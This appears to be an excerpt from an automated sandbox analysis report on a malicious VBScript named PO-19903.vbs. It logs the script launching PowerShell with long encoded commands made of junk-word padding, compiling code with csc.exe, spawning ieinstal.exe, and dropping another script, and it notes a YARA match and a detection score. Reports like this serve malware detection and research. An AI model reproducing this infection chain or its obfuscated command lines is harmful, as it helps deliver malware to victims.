aQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 17348
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 17348
    Source: 00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0505E827
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0505E858
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E3AF0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E5140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E2772
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085EDB20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E5140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085E3798
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08636F58
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086330B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0863309E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086758E0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08678129
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08678138
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08747888
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08740040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08740012
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874B1EF
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874B210
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F9140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087FF298
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F3C98
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F3C8A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F60942
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F62A90
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F61CC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F6C8F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F6E8A8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0867C741
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess Stats: CPU usage > 98%
    Source: PO-19903.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dll
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBr